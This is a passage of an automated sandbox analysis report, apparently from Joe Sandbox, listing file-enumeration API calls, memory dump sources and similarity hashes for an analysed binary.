                                • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FDC), ref: 00944971
                                • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FE0), ref: 00944987
                                • Part of subcall function 00944910: FindNextFileA.KERNEL32(000000FF,?), ref: 00944B7D
                                • Part of subcall function 00944910: FindClose.KERNEL32(000000FF), ref: 00944B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 99af37382bc856fed5ff505e336e5e22b0d15b767e91d8794ee8a65bea79cf54
                              • Instruction ID: 6897405cb2b751e8a4ac20f59f37660cd5fcfee5163cfc1a7de3ce104b277973
                              • Opcode Fuzzy Hash: 99af37382bc856fed5ff505e336e5e22b0d15b767e91d8794ee8a65bea79cf54
                              • Instruction Fuzzy Hash: 4B21987690020867C794FBB0DC46FEE333DABD4701F004554B65D93191EE74AAC88B93